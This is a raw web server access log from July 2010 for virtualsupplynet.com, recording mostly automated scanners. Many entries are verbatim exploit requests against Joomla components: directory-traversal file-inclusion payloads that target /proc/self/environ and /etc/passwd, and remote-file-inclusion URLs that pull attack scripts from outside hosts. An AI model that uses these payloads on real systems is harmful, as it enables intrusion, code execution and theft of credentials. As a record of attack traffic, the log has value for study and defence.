203.4.254.9 - - [09/Jul/2010:17:08:33 -0700] "GET /logs/access_100619.log////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "virtualsupplynet.com"
203.4.254.9 - - [09/Jul/2010:17:08:34 -0700] "GET ///////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "virtualsupplynet.com"
203.4.254.9 - - [09/Jul/2010:17:08:35 -0700] "GET /logs////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "virtualsupplynet.com"
203.4.254.9 - - [09/Jul/2010:17:10:28 -0700] "GET /logs/access_100703.log////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "virtualsupplynet.com"
217.159.130.74 - - [09/Jul/2010:17:20:22 -0700] "GET /logs/access_100619.log////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
217.159.130.74 - - [09/Jul/2010:17:20:22 -0700] "GET ///////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
217.159.130.74 - - [09/Jul/2010:17:20:23 -0700] "GET /logs////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
117.53.96.161 - - [09/Jul/2010:21:55:00 -0700] "HEAD / HTTP/1.0" 200 0 "http://www.virtualsupplynet.com" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.virtualsupplynet.com"
95.220.133.59 - - [09/Jul/2010:22:02:34 -0700] "GET /logs/access_100410.log HTTP/1.1" 200 75311 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/523.12 (KHTML, like Gecko) Version/3.0.4 Safari/523.12" "www.virtualsupplynet.com"
208.80.193.121 - - [09/Jul/2010:22:36:37 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; MSN Optimized;US; MSN Optimized;US)" "www.virtualsupplynet.com"
174.142.61.241 - - [09/Jul/2010:22:52:25 -0700] "GET /logs/access_100703.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
174.142.61.241 - - [09/Jul/2010:22:52:26 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
174.142.61.241 - - [09/Jul/2010:22:52:26 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
99.230.157.48 - - [09/Jul/2010:23:01:42 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "www.virtualsupplynet.com"
99.230.157.48 - - [09/Jul/2010:23:23:35 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "www.virtualsupplynet.com"
99.230.157.48 - - [09/Jul/2010:23:44:32 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
83.16.100.218 - - [09/Jul/2010:23:47:31 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
83.16.100.218 - - [09/Jul/2010:23:47:31 -0700] "GET /logs/access_100619.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
83.16.100.218 - - [09/Jul/2010:23:47:31 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
83.16.100.218 - - [09/Jul/2010:23:47:45 -0700] "GET /logs/access_100703.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:00:07:48 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "www.virtualsupplynet.com"
87.233.70.44 - - [10/Jul/2010:00:14:55 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "virtualsupplynet.com"
87.233.70.44 - - [10/Jul/2010:00:26:59 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "virtualsupplynet.com"
87.233.70.44 - - [10/Jul/2010:00:26:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "virtualsupplynet.com"
87.233.70.44 - - [10/Jul/2010:00:27:00 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "virtualsupplynet.com"
87.233.70.44 - - [10/Jul/2010:00:31:51 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:00:32:08 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
69.10.136.189 - - [10/Jul/2010:00:33:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
124.254.77.243 - - [10/Jul/2010:00:37:56 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
87.233.70.44 - - [10/Jul/2010:00:40:51 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "virtualsupplynet.com"
87.233.70.44 - - [10/Jul/2010:00:40:51 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "virtualsupplynet.com"
87.233.70.44 - - [10/Jul/2010:00:40:52 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "virtualsupplynet.com"
196.38.40.180 - - [10/Jul/2010:00:50:52 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
196.38.40.180 - - [10/Jul/2010:00:50:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
196.38.40.180 - - [10/Jul/2010:00:52:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
196.38.40.180 - - [10/Jul/2010:00:52:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
196.38.40.180 - - [10/Jul/2010:00:52:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:00:57:52 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "www.virtualsupplynet.com"
124.254.77.243 - - [10/Jul/2010:01:02:43 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
124.254.77.243 - - [10/Jul/2010:01:02:44 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
124.254.77.243 - - [10/Jul/2010:01:02:45 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
69.10.136.189 - - [10/Jul/2010:01:05:31 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
69.10.136.189 - - [10/Jul/2010:01:05:31 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
69.10.136.189 - - [10/Jul/2010:01:05:31 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
124.254.77.243 - - [10/Jul/2010:01:12:23 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:01:21:59 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:01:46:35 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
66.249.65.140 - - [10/Jul/2010:02:00:20 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:02:07:59 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:02:30:39 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
89.108.64.192 - - [10/Jul/2010:02:50:27 -0700] "GET /logs/access_100703.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "virtualsupplynet.com"
89.108.64.192 - - [10/Jul/2010:02:50:28 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "virtualsupplynet.com"
89.108.64.192 - - [10/Jul/2010:02:50:28 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:02:53:51 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.virtualsupplynet.com"
91.121.92.195 - - [10/Jul/2010:02:56:52 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
91.121.92.195 - - [10/Jul/2010:03:11:09 -0700] "GET /logs/access_100703.log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
91.121.92.195 - - [10/Jul/2010:03:11:10 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
91.121.92.195 - - [10/Jul/2010:03:11:10 -0700] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:03:17:10 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
62.44.82.118 - - [10/Jul/2010:03:22:20 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:03:39:33 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:04:03:00 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:04:16 -0700] "GET /logs/access_100703.log//index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:04:16 -0700] "GET /logs//index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:04:16 -0700] "GET /index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:06:53 -0700] "GET /logs/access_100703.log//index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:06:53 -0700] "GET /index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:06:53 -0700] "GET /logs//index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:08:28 -0700] "GET /logs/access_100703.log%20%20//index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:08:28 -0700] "GET /index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:08:28 -0700] "GET /logs//index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:09:47 -0700] "GET /index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:09:47 -0700] "GET /logs//index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:09:48 -0700] "GET /logs/access_100703.log%20%20//index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:10:48 -0700] "GET /logs/access_100703.log%20%20//index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:10:48 -0700] "GET /index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:10:48 -0700] "GET /logs//index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:11:19 -0700] "GET /index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:11:19 -0700] "GET /logs//index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
67.205.102.122 - - [10/Jul/2010:04:11:19 -0700] "GET /logs/access_100703.log%20%20//index.php?option=com_g2bridge&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:04:11:41 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:04:11:58 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:04:15:01 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:04:15:14 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:04:20:21 -0700] "GET /logs/access_100619.log/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:04:20:21 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:04:20:22 -0700] "GET /logs/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:04:20:24 -0700] "GET /logs/access_100619.log/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:04:20:24 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:04:20:24 -0700] "GET /logs/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.813" "virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:04:27:21 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:04:30:30 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "www.virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:04:34:28 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:04:40:50 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:04:43:21 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:04:54:33 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:05:12:34 -0700] "GET /logs/access_100619.log/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:05:12:35 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:05:12:35 -0700] "GET /logs/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.803" "virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:05:15:18 -0700] "GET /logs/access_100619.log/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:05:15:19 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:05:15:20 -0700] "GET /logs/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.803" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:05:18:10 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:05:41:45 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "www.virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:05:48:19 -0700] "GET /logs/access_100619.log/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:05:48:19 -0700] "GET /logs/access_100619.log/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:05:48:19 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:05:48:19 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:05:48:20 -0700] "GET /logs/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.171.45.253 - - [10/Jul/2010:05:48:20 -0700] "GET /logs/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.813" "virtualsupplynet.com"
67.195.115.249 - - [10/Jul/2010:05:57:00 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [10/Jul/2010:05:57:01 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:06:03:27 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:06:25:20 -0700] "GET /logs/access_100619.log/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:06:25:21 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:06:25:21 -0700] "GET /logs/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.803" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:06:27:28 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
91.121.92.195 - - [10/Jul/2010:06:37:04 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
91.121.92.195 - - [10/Jul/2010:06:44:54 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
